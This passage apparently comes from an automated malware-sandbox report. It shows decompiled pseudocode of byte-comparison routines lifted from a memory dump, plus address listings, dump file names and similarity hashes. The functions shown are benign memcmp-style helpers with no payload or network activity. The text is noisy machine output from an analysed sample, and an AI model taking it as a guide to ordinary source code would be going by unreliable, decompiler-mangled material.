						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t38 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t38;
								}
								goto L17;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t32 = __edx - 1; // -1
							__esi = __edx + _t32;
							if(__edx + _t32 != 0) {
								goto L1;
							}
							goto L14;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t26 = __edx - 1; // -1
						__esi = __edx + _t26;
						if(__edx + _t26 != 0) {
							goto L1;
						}
						goto L12;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t20 = __edx - 1; // -1
					__esi = __edx + _t20;
					if(__edx + _t20 != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t291;
				goto L2;
			}

0x00876bf0
0x00876bf0
0x00876bf6
0x00876c6e
0x00876c70
0x00876c72
0x00000000
0x00000000
0x00876c78
0x00876c7e
0x00876cf5
0x00876cf7
0x00876cf9
0x00000000
0x00000000
0x00876cff
0x00876d05
0x00876d7c
0x00876d7e
0x00876d80
0x00000000
0x00000000
0x00876d86
0x00876d8c
0x00876e03
0x00876e05
0x00876e07
0x00000000
0x00000000
0x00876e13
0x00876e8b
0x00876e8d
0x00876e8f
0x00000000
0x00000000
0x00876e95
0x00876e9b
0x00876f12
0x00876f14
0x00876f16
0x00000000
0x00000000
0x00876f1c
0x00876f22
0x00876f99
0x00876f9b
0x00876f9d
0x00000000
0x00000000
0x00876fab
0x00876fad
0x00876bc8
0x00876bd0
0x00876bd2
0x008767e8
0x008767f0
0x008767f2
0x008767ff
0x008767ff
0x008767ff
0x00876430
0x008770d4
0x008770d4
0x00876bdf
0x00876be5
0x00876fc6
0x00876fc6
0x00000000
0x00876beb
0x00000000
0x00876beb
0x00876be5
0x00876fba
0x00876fc0
0x00000000
0x00000000
0x00000000
0x00876fc0
0x00876f2b
0x00876f2d
0x00876f42
0x00876f4a
0x00876f4c
0x00876f61
0x00876f69
0x00876f6b
0x00876f80
0x00876f88
0x00876f8a
0x00876f93
0x00876f93
0x00876f93
0x00000000
0x00876f8a
0x00876f74
0x00876f74
0x00876f7a
0x00000000
0x00000000
0x00000000
0x00876f7a
0x00876f55
0x00876f55
0x00876f5b
0x00000000
0x00000000
0x00000000
0x00876f5b
0x00876f36
0x00876f36
0x00876f3c
0x00000000
0x00000000
0x00000000
0x00876f3c
0x00876ea4
0x00876ea6
0x00876ebb
0x00876ec3
0x00876ec5
0x00876eda
0x00876ee2
0x00876ee4
0x00876ef9
0x00876f01
0x00876f03
0x00876f0c
0x00876f0c
0x00876f0c
0x00000000
0x00876f03
0x00876eed
0x00876eed
0x00876ef3
0x00000000
0x00000000
0x00000000
0x00876ef3
0x00876ece
0x00876ece
0x00876ed4
0x00000000
0x00000000
0x00000000
0x00876ed4
0x00876eaf
0x00876eaf
0x00876eb5
0x00000000
0x00000000
0x00000000
0x00876eb5
0x00876e1d
0x00876e1f
0x00876e34
0x00876e3c
0x00876e3e
0x00876e53
0x00876e5b
0x00876e5d
0x00876e72
0x00876e7a
0x00876e7c
0x00876e85
0x00876e85
0x00876e85
0x00000000
0x00876e7c
0x00876e66
0x00876e66
0x00876e6c
0x00000000
0x00000000
0x00000000
0x00876e6c
0x00876e47
0x00876e47
0x00876e4d
0x00000000
0x00000000
0x00000000
0x00876e4d
0x00876e28
0x00876e28
0x00876e2e
0x00000000
0x00000000
0x00000000
0x00876e2e
0x00876d95
0x00876d97
0x00876dac
0x00876db4
0x00876db6
0x00876dcb
0x00876dd3
0x00876dd5
0x00876dea
0x00876df2
0x00876df4
0x00876dfd
0x00876dfd
0x00876dfd
0x00000000
0x00876df4
0x00876dde
0x00876dde
0x00876de4
0x00000000
0x00000000
0x00000000
0x00876de4
0x00876dbf
0x00876dbf
0x00876dc5
0x00000000
0x00000000
0x00000000
0x00876dc5
0x00876da0
0x00876da0
0x00876da6
0x00000000
0x00000000
0x00000000
0x00876da6
0x00876d0e
0x00876d10
0x00876d25
0x00876d2d
0x00876d2f
0x00876d44
0x00876d4c
0x00876d4e
0x00876d63
0x00876d6b
0x00876d6d
0x00876d76
0x00876d76
0x00876d76
0x00000000
0x00876d6d
0x00876d57
0x00876d57
0x00876d5d
0x00000000
0x00000000
0x00000000
0x00876d5d
0x00876d38
0x00876d38
0x00876d3e
0x00000000
0x00000000
0x00000000
0x00876d3e
0x00876d19
0x00876d19
0x00876d1f
0x00000000
0x00000000
0x00000000
0x00876d1f
0x00876c87
0x00876c89
0x00876c9e
0x00876ca6
0x00876ca8
0x00876cbd
0x00876cc5
0x00876cc7
0x00876cdc
0x00876ce4
0x00876ce6
0x00876cef
0x00876cef
0x00876cef
0x00000000
0x00876ce6
0x00876cd0
0x00876cd0
0x00876cd6
0x00000000
0x00000000
0x00000000
0x00876cd6
0x00876cb1
0x00876cb1
0x00876cb7
0x00000000
0x00000000
0x00000000
0x00876cb7
0x00876c92
0x00876c92
0x00876c98
0x00000000
0x00000000
0x00000000
0x00876bf8
0x00876bf8
0x00876bfc
0x00876c00
0x00876c02
0x00876c17
0x00876c17
0x00876c1b
0x00876c1f
0x00876c21
0x00876c36
0x00876c36
0x00876c3a
0x00876c3e
0x00876c40
0x00876c55
0x00876c55
0x00876c59
0x00876c5d
0x00876c5f
0x00876c61
0x00876c68
0x00876c68
0x00876c68
0x00000000
0x00876c5f
0x00876c42
0x00876c46
0x00876c49
0x00876c49
0x00876c4f
0x00000000
0x00000000
0x00000000
0x00876c4f
0x00876c23
0x00876c27
0x00876c2a
0x00876c2a
0x00876c30
0x00000000
0x00000000
0x00000000
0x00876c30
0x00876c04
0x00876c08
0x00876c0b
0x00876c0b
0x00876c11
0x00000000
0x00000000
0x00000000
0x00876c11
0x00876091
0x00876091
0x00000000

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: fc9d5fb7af13cae94cc4ad260718f34e2f38295c14429b504e19a090290df227
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 92C16E63E1ADB2498736462D441822AEF62BF91B4031FC3D1DCD87F18EE623ED6595D0

Uniqueness

Uniqueness Score: -1.00%

Function 00876808, Relevance: .3, Instructions: 349
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00876808(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t200;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t205;
				signed int _t210;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t324;
				void* _t326;
				void* _t328;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t284 = 0;
					L15:
					if(_t284 != 0) {
						goto L1;
					}
					_t200 =  *(_t191 - 0x1a);
					if(_t200 ==  *(_t195 - 0x1a)) {
						_t284 = 0;
						L26:
						if(_t284 != 0) {
							goto L1;
						}
						_t201 =  *(_t191 - 0x16);
						if(_t201 ==  *(_t195 - 0x16)) {
							_t284 = 0;
							L37:
							if(_t284 != 0) {
								goto L1;
							}
							_t202 =  *(_t191 - 0x12);
							if(_t202 ==  *(_t195 - 0x12)) {
								_t284 = 0;
								L48:
								if(_t284 != 0) {
									goto L1;
								}
								_t203 =  *(_t191 - 0xe);
								if(_t203 ==  *(_t195 - 0xe)) {
									_t284 = 0;
									L59:
									if(_t284 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t284 = 0;
										L70:
										if(_t284 != 0) {
											goto L1;
										}
										_t205 =  *(_t191 - 6);
										if(_t205 ==  *(_t195 - 6)) {
											_t284 = 0;
											L81:
											if(_t284 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t287 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t287 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t8 = (0 | _t192 > 0x00000000) - 1; // -1
													_t192 = (_t192 > 0) + _t8;
												}
												goto L3;
											}
											_t210 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
											if(_t210 != 0) {
												_t192 = _t210;
												goto L3;
											}
											goto L4;
										}
										_t289 = (_t205 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t289 == 0) {
											L74:
											_t291 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t291 == 0) {
												L76:
												_t293 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t293 == 0) {
													L78:
													_t284 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t284 != 0) {
														_t182 = (0 | _t284 > 0x00000000) - 1; // -1
														_t284 = (_t284 > 0) + _t182;
													}
													goto L81;
												}
												_t176 = (0 | _t293 > 0x00000000) - 1; // -1
												_t284 = (_t293 > 0) + _t176;
												if(_t284 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t170 = (0 | _t291 > 0x00000000) - 1; // -1
											_t284 = (_t291 > 0) + _t170;
											if(_t284 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t164 = (0 | _t289 > 0x00000000) - 1; // -1
										_t284 = (_t289 > 0) + _t164;
										if(_t284 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t296 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t296 == 0) {
										L63:
										_t298 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t298 == 0) {
											L65:
											_t300 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t300 == 0) {
												L67:
												_t284 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t284 != 0) {
													_t157 = (0 | _t284 > 0x00000000) - 1; // -1
													_t284 = (_t284 > 0) + _t157;
												}
												goto L70;
											}
											_t151 = (0 | _t300 > 0x00000000) - 1; // -1
											_t284 = (_t300 > 0) + _t151;
											if(_t284 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t145 = (0 | _t298 > 0x00000000) - 1; // -1
										_t284 = (_t298 > 0) + _t145;
										if(_t284 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t139 = (0 | _t296 > 0x00000000) - 1; // -1
									_t284 = (_t296 > 0) + _t139;
									if(_t284 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t303 = (_t203 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t303 == 0) {
									L52:
									_t305 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t305 == 0) {
										L54:
										_t307 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t307 == 0) {
											L56:
											_t284 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t284 != 0) {
												_t131 = (0 | _t284 > 0x00000000) - 1; // -1
												_t284 = (_t284 > 0) + _t131;
											}
											goto L59;
										}
										_t125 = (0 | _t307 > 0x00000000) - 1; // -1
										_t284 = (_t307 > 0) + _t125;
										if(_t284 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t119 = (0 | _t305 > 0x00000000) - 1; // -1
									_t284 = (_t305 > 0) + _t119;
									if(_t284 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t113 = (0 | _t303 > 0x00000000) - 1; // -1
								_t284 = (_t303 > 0) + _t113;
								if(_t284 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t310 = (_t202 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t284 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t284 != 0) {
											_t106 = (0 | _t284 > 0x00000000) - 1; // -1
											_t284 = (_t284 > 0) + _t106;
										}
										goto L48;
									}
									_t100 = (0 | _t314 > 0x00000000) - 1; // -1
									_t284 = (_t314 > 0) + _t100;
									if(_t284 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t94 = (0 | _t312 > 0x00000000) - 1; // -1
								_t284 = (_t312 > 0) + _t94;
								if(_t284 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t88 = (0 | _t310 > 0x00000000) - 1; // -1
							_t284 = (_t310 > 0) + _t88;
							if(_t284 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t317 = (_t201 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t317 == 0) {
							L30:
							_t319 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t319 == 0) {
								L32:
								_t321 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t321 == 0) {
									L34:
									_t284 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t284 != 0) {
										_t81 = (0 | _t284 > 0x00000000) - 1; // -1
										_t284 = (_t284 > 0) + _t81;
									}
									goto L37;
								}
								_t75 = (0 | _t321 > 0x00000000) - 1; // -1
								_t284 = (_t321 > 0) + _t75;
								if(_t284 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t69 = (0 | _t319 > 0x00000000) - 1; // -1
							_t284 = (_t319 > 0) + _t69;
							if(_t284 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t63 = (0 | _t317 > 0x00000000) - 1; // -1
						_t284 = (_t317 > 0) + _t63;
						if(_t284 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t324 = (_t200 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t324 == 0) {
						L19:
						_t326 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t326 == 0) {
							L21:
							_t328 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t328 == 0) {
								L23:
								_t284 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t284 != 0) {
									_t56 = (0 | _t284 > 0x00000000) - 1; // -1
									_t284 = (_t284 > 0) + _t56;
								}
								goto L26;
							}
							_t50 = (0 | _t328 > 0x00000000) - 1; // -1
							_t284 = (_t328 > 0) + _t50;
							if(_t284 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t44 = (0 | _t326 > 0x00000000) - 1; // -1
						_t284 = (_t326 > 0) + _t44;
						if(_t284 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t38 = (0 | _t324 > 0x00000000) - 1; // -1
					_t284 = (_t324 > 0) + _t38;
					if(_t284 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t31 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t31;
								}
								goto L15;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t25 = __edx - 1; // -1
							__esi = __edx + _t25;
							if(__edx + _t25 != 0) {
								goto L1;
							}
							goto L12;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t19 = __edx - 1; // -1
						__esi = __edx + _t19;
						if(__edx + _t19 != 0) {
							goto L1;
						}
						goto L10;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t13 = __edx - 1; // -1
					__esi = __edx + _t13;
					if(__edx + _t13 != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t284;
				goto L3;
			}

0x00876808
0x00876808
0x0087680e
0x00876885
0x00876887
0x00876889
0x00000000
0x00000000
0x0087688f
0x00876895
0x0087690c
0x0087690e
0x00876910
0x00000000
0x00000000
0x00876916
0x0087691c
0x00876993
0x00876995
0x00876997
0x00000000
0x00000000
0x0087699d
0x008769a3
0x00876a1a
0x00876a1c
0x00876a1e
0x00000000
0x00000000
0x00876a24
0x00876a2a
0x00876aa1
0x00876aa3
0x00876aa5
0x00000000
0x00000000
0x00876ab1
0x00876b29
0x00876b2b
0x00876b2d
0x00000000
0x00000000
0x00876b33
0x00876b39
0x00876bb0
0x00876bb2
0x00876bb4
0x00000000
0x00000000
0x00876bc2
0x0087642e
0x00876430
0x008770d4
0x008770d4
0x00876bd0
0x00876bd2
0x008767e8
0x008767f0
0x008767f2
0x008767ff
0x008767ff
0x008767ff
0x00000000
0x008767f2
0x00876bdf
0x00876be5
0x00876fc6
0x00000000
0x00876fc6
0x00000000
0x00876beb
0x00876b42
0x00876b44
0x00876b59
0x00876b61
0x00876b63
0x00876b78
0x00876b80
0x00876b82
0x00876b97
0x00876b9f
0x00876ba1
0x00876baa
0x00876baa
0x00876baa
0x00000000
0x00876ba1
0x00876b8b
0x00876b8b
0x00876b91
0x00000000
0x00000000
0x00000000
0x00876b91
0x00876b6c
0x00876b6c
0x00876b72
0x00000000
0x00000000
0x00000000
0x00876b72
0x00876b4d
0x00876b4d
0x00876b53
0x00000000
0x00000000
0x00000000
0x00876b53
0x00876abb
0x00876abd
0x00876ad2
0x00876ada
0x00876adc
0x00876af1
0x00876af9
0x00876afb
0x00876b10
0x00876b18
0x00876b1a
0x00876b23
0x00876b23
0x00876b23
0x00000000
0x00876b1a
0x00876b04
0x00876b04
0x00876b0a
0x00000000
0x00000000
0x00000000
0x00876b0a
0x00876ae5
0x00876ae5
0x00876aeb
0x00000000
0x00000000
0x00000000
0x00876aeb
0x00876ac6
0x00876ac6
0x00876acc
0x00000000
0x00000000
0x00000000
0x00876acc
0x00876a33
0x00876a35
0x00876a4a
0x00876a52
0x00876a54
0x00876a69
0x00876a71
0x00876a73
0x00876a88
0x00876a90
0x00876a92
0x00876a9b
0x00876a9b
0x00876a9b
0x00000000
0x00876a92
0x00876a7c
0x00876a7c
0x00876a82
0x00000000
0x00000000
0x00000000
0x00876a82
0x00876a5d
0x00876a5d
0x00876a63
0x00000000
0x00000000
0x00000000
0x00876a63
0x00876a3e
0x00876a3e
0x00876a44
0x00000000
0x00000000
0x00000000
0x00876a44
0x008769ac
0x008769ae
0x008769c3
0x008769cb
0x008769cd
0x008769e2
0x008769ea
0x008769ec
0x00876a01
0x00876a09
0x00876a0b
0x00876a14
0x00876a14
0x00876a14
0x00000000
0x00876a0b
0x008769f5
0x008769f5
0x008769fb
0x00000000
0x00000000
0x00000000
0x008769fb
0x008769d6
0x008769d6
0x008769dc
0x00000000
0x00000000
0x00000000
0x008769dc
0x008769b7
0x008769b7
0x008769bd
0x00000000
0x00000000
0x00000000
0x008769bd
0x00876925
0x00876927
0x0087693c
0x00876944
0x00876946
0x0087695b
0x00876963
0x00876965
0x0087697a
0x00876982
0x00876984
0x0087698d
0x0087698d
0x0087698d
0x00000000
0x00876984
0x0087696e
0x0087696e
0x00876974
0x00000000
0x00000000
0x00000000
0x00876974
0x0087694f
0x0087694f
0x00876955
0x00000000
0x00000000
0x00000000
0x00876955
0x00876930
0x00876930
0x00876936
0x00000000
0x00000000
0x00000000
0x00876936
0x0087689e
0x008768a0
0x008768b5
0x008768bd
0x008768bf
0x008768d4
0x008768dc
0x008768de
0x008768f3
0x008768fb
0x008768fd
0x00876906
0x00876906
0x00876906
0x00000000
0x008768fd
0x008768e7
0x008768e7
0x008768ed
0x00000000
0x00000000
0x00000000
0x008768ed
0x008768c8
0x008768c8
0x008768ce
0x00000000
0x00000000
0x00000000
0x008768ce
0x008768a9
0x008768a9
0x008768af
0x00000000
0x00000000
0x00000000
0x00876810
0x00876810
0x00876813
0x00876817
0x00876819
0x0087682e
0x0087682e
0x00876832
0x00876836
0x00876838
0x0087684d
0x0087684d
0x00876851
0x00876855
0x00876857
0x0087686c
0x0087686c
0x00876870
0x00876874
0x00876876
0x00876878
0x0087687f
0x0087687f
0x0087687f
0x00000000
0x00876876
0x00876859
0x0087685d
0x00876860
0x00876860
0x00876866
0x00000000
0x00000000
0x00000000
0x00876866
0x0087683a
0x0087683e
0x00876841
0x00876841
0x00876847
0x00000000
0x00000000
0x00000000
0x00876847
0x0087681b
0x0087681f
0x00876822
0x00876822
0x00876828
0x00000000
0x00000000
0x00000000
0x00876828
0x00876091
0x00876091
0x00000000

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: 15efb2854aea8443d440b3109ad3bb318b1f6d2f80a0f54574c3f7d3e4069b75
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: 36C16E63D0ADB2498736453D441823AEFA2BF91B4031AC3E5CCD87F18EE623ED6595D0

Uniqueness

Uniqueness Score: -1.00%

Function 00876436, Relevance: .3, Instructions: 332
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00876436(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t197;
				signed int _t271;
				void* _t274;
				void* _t276;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t309;
				void* _t311;
				void* _t313;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t271 = 0;
					L12:
					if(_t271 != 0) {
						goto L1;
					}
					_t192 =  *(_t183 - 0x19);
					if(_t192 ==  *(_t187 - 0x19)) {
						_t271 = 0;
						L23:
						if(_t271 != 0) {
							goto L1;
						}
						_t193 =  *(_t183 - 0x15);
						if(_t193 ==  *(_t187 - 0x15)) {
							_t271 = 0;
							L34:
							if(_t271 != 0) {
								goto L1;
							}
							_t194 =  *(_t183 - 0x11);
							if(_t194 ==  *(_t187 - 0x11)) {
								_t271 = 0;
								L45:
								if(_t271 != 0) {
									goto L1;
								}
								_t195 =  *(_t183 - 0xd);
								if(_t195 ==  *(_t187 - 0xd)) {
									_t271 = 0;
									L56:
									if(_t271 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t271 = 0;
										L67:
										if(_t271 != 0) {
											goto L1;
										}
										_t197 =  *(_t183 - 5);
										if(_t197 ==  *(_t187 - 5)) {
											_t271 = 0;
											L78:
											if(_t271 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t182 = (0 | _t184 > 0x00000000) - 1; // -1
												_t184 = (_t184 > 0) + _t182;
											}
											L2:
											return _t184;
										}
										_t274 = (_t197 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t274 == 0) {
											L71:
											_t276 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t276 == 0) {
												L73:
												_t278 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t278 == 0) {
													L75:
													_t271 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t271 != 0) {
														_t176 = (0 | _t271 > 0x00000000) - 1; // -1
														_t271 = (_t271 > 0) + _t176;
													}
													goto L78;
												}
												_t170 = (0 | _t278 > 0x00000000) - 1; // -1
												_t271 = (_t278 > 0) + _t170;
												if(_t271 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t164 = (0 | _t276 > 0x00000000) - 1; // -1
											_t271 = (_t276 > 0) + _t164;
											if(_t271 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t158 = (0 | _t274 > 0x00000000) - 1; // -1
										_t271 = (_t274 > 0) + _t158;
										if(_t271 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t281 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t281 == 0) {
										L60:
										_t283 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t283 == 0) {
											L62:
											_t285 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t285 == 0) {
												L64:
												_t271 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t271 != 0) {
													_t151 = (0 | _t271 > 0x00000000) - 1; // -1
													_t271 = (_t271 > 0) + _t151;
												}
												goto L67;
											}
											_t145 = (0 | _t285 > 0x00000000) - 1; // -1
											_t271 = (_t285 > 0) + _t145;
											if(_t271 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t139 = (0 | _t283 > 0x00000000) - 1; // -1
										_t271 = (_t283 > 0) + _t139;
										if(_t271 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t133 = (0 | _t281 > 0x00000000) - 1; // -1
									_t271 = (_t281 > 0) + _t133;
									if(_t271 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t288 = (_t195 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t288 == 0) {
									L49:
									_t290 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t290 == 0) {
										L51:
										_t292 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t292 == 0) {
											L53:
											_t271 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t271 != 0) {
												_t125 = (0 | _t271 > 0x00000000) - 1; // -1
												_t271 = (_t271 > 0) + _t125;
											}
											goto L56;
										}
										_t119 = (0 | _t292 > 0x00000000) - 1; // -1
										_t271 = (_t292 > 0) + _t119;
										if(_t271 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t113 = (0 | _t290 > 0x00000000) - 1; // -1
									_t271 = (_t290 > 0) + _t113;
									if(_t271 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t107 = (0 | _t288 > 0x00000000) - 1; // -1
